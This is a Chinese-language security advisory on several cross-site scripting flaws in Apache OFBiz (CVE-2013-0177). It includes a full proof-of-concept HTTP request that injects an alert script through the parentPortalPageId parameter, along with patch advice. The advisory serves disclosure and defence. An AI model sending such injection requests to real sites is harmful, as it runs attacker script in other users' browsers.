Apache OFBiz 多个跨站脚本漏洞

发布日期:2013-01-18
更新日期:2013-01-24

受影响系统:
Apache Group OfBiz 10.4.2
 Apache Group OfBiz 10.4.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57463
 CVE(CAN) ID: CVE-2013-0177
 
Apache Open For Business(Apache OFBiz)是开源的ERP系统。
 
Apache OFBiz 10.04.05、11.04.02之前版本存在多个跨站脚本漏洞,攻击者可利用这些漏洞在受影响站点的用户浏览器中执行任意HTML和脚本代码。
 
<*来源:Juan Caillava
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET
 /exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&quot;xss&quot;)&amp;lt;/script&amp;gt;
 HTTP/1.1
 Host: www.example.com:8443
 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
 Firefox/17.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
 Connection: keep-alive
 Referer: https://www.example.com:8443/exampleext/control/main?externalLoginKey=EL367731470037
 Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Apache Group
 ------------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
http://httpd.apache.org/

相关推荐